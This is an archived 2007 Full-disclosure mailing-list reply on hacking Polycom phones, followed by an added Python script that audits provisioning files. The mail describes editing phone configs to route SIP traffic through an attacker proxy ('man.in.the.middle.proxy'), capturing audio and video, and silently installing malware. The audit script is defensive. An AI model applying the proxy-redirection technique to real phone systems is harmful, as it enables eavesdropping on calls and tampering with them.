
| Subject: | Re: [Full-disclosure] Polycom hacking |
|---|---|
| Date: | Tue, 26 Jun 2007 14:52:50 -0400 |
Thanks. I'm not that interested in DoSes, but I'm thinking that you could mget the entire contents, alter them to your satisfaction and then mput them. Don't know how much memory these things have yet, but you ought to be able to iframe silent installs of malware, script the capture of all audio and video traffic from/to the device, etc. Could be quite interesting.
```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<phone102>
  <reg reg.1.displayName="666" reg.1.address="666" reg.1.label="666"
       reg.1.type="private" reg.1.lcs="" reg.1.thirdPartyName=""
       reg.1.auth.userId="666" reg.1.auth.password="666"
       reg.1.server.1.address="original.server.ip" reg.1.server.1.port="5060"
       reg.1.server.1.transport="UDPonly" reg.1.server.1.expires="1800"
       reg.1.server.1.expires.overlap="" reg.1.server.1.register="1"
       reg.1.outboundProxy.address="man.in.the.middle.proxy"
       reg.1.outboundProxy.port="5060" reg.1.outboundProxy.transport=""
       reg.1.ringType="2" reg.1.lineKeys="" reg.1.callsPerLineKey=""/>
  <!-- stripped the rest... -->
</phone102>
```
Where reg.1.server.1.address= points back at their PBX/H323 server. The problem with this would lie on the networking side. Local without VLANs... not a problem. Remotely, it would take some work but it's doable. Polycoms are horrible when it comes to doing network address translation, and many set them up in dirty DMZs to get them to work.
Soundstations use the same XML files as the phones do. In sip.cfg:
Obvious entries to fill... Would work like this:
Registration and subsequent connection(s): Soundstation --> AttackerProxy --> RealServer
With AttackerProxy looking at traffic you could recompile data, block hosts from the conference, inject new participants, etc.
"Wise men talk because they have something to say; fools, because they have to say something." -- Plato
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
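The attack above is a provisioning-file edit: point reg.N.outboundProxy.address at a host you control and the phone dutifully routes registration and calls through it. The defensive counterpart is to audit what the phones are actually being served. The script below is an added example, not code from the thread or from Polycom; it parses a per-phone config modelled on the fragment quoted above (the sample XML and the hostnames original.server.ip and man.in.the.middle.proxy are constructed placeholders) and flags an outbound proxy that differs from the registrar, SIP hosts outside an allow-list, non-TLS signalling, and a SIP password equal to the user ID. The attribute names follow the reg.N.* keys shown in the mail; treating server.1 as the registrar and outboundProxy as the proxy is this example's assumption.

```python
"""Audit Polycom reg.N.* provisioning attributes for a man-in-the-middle
outbound proxy and related weak settings.  Added example, not the thread's
or Polycom's own code; the config below is constructed from the fragment in
the mail and the hostnames are placeholders."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: reg.1 mirrors the quoted fragment (proxy redirected),
# reg.2 is a second line provisioned the way we would want to see it.
SAMPLE_CFG = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<phone102>
  <reg reg.1.displayName="666" reg.1.address="666" reg.1.label="666"
       reg.1.type="private" reg.1.auth.userId="666" reg.1.auth.password="666"
       reg.1.server.1.address="original.server.ip" reg.1.server.1.port="5060"
       reg.1.server.1.transport="UDPonly" reg.1.server.1.expires="1800"
       reg.1.server.1.register="1"
       reg.1.outboundProxy.address="man.in.the.middle.proxy"
       reg.1.outboundProxy.port="5060" reg.1.outboundProxy.transport=""
       reg.2.address="102" reg.2.auth.userId="102" reg.2.auth.password="s3cret"
       reg.2.server.1.address="original.server.ip" reg.2.server.1.transport="TLS"
       reg.2.outboundProxy.address="original.server.ip"/>
</phone102>
"""

_REG_KEY = re.compile(r"reg\.(\d+)\.(.+)")


def registrations(cfg_xml):
    """Group the flat reg.N.<key> attributes of every <reg> element by line N.

    Returns {N: {"server.1.address": ..., "outboundProxy.address": ..., ...}}.
    """
    regs = {}
    for reg in ET.fromstring(cfg_xml).iter("reg"):
        for key, value in reg.attrib.items():
            m = _REG_KEY.match(key)
            if m:
                regs.setdefault(int(m.group(1)), {})[m.group(2)] = value
    return regs


def audit(cfg_xml, trusted_hosts):
    """Return [(line, finding), ...] for every registration in the config.

    trusted_hosts: hostnames/IPs the phone is allowed to register with or
    proxy through (the organisation's own PBX and SBCs).
    """
    findings = []
    for n, attrs in sorted(registrations(cfg_xml).items()):
        registrar = attrs.get("server.1.address", "")
        proxy = attrs.get("outboundProxy.address", "")

        # The pattern from the mail: registrar left intact, proxy redirected.
        if proxy and proxy != registrar:
            findings.append((n, f"outbound proxy {proxy!r} differs from registrar {registrar!r}"))

        # Anything not on the allow-list is suspect regardless of the above.
        for host in (registrar, proxy):
            if host and host not in trusted_hosts:
                findings.append((n, f"untrusted SIP host {host!r}"))

        # Plaintext signalling lets the proxy (or anyone on path) read/alter calls.
        transport = attrs.get("server.1.transport", "")
        shown = transport or "default"
        if transport.upper() != "TLS":
            findings.append((n, f"signalling transport {shown!r} is not TLS"))

        # Credentials as weak as the "666"/"666" pair in the quoted config.
        user = attrs.get("auth.userId")
        if user and user == attrs.get("auth.password"):
            findings.append((n, "SIP password equals user ID"))
    return findings


if __name__ == "__main__":
    # In practice: fetch the phone's .cfg from the provisioning server (or the
    # device itself) and pass the file contents here instead of SAMPLE_CFG.
    for line, msg in audit(SAMPLE_CFG, {"original.server.ip"}):
        print(f"reg.{line}: {msg}")
```

Run it against the configs your provisioning server actually hands out (and, if you can pull them, against what the phones currently hold) rather than the master copy in version control; the whole point of the attack is that the two stop matching.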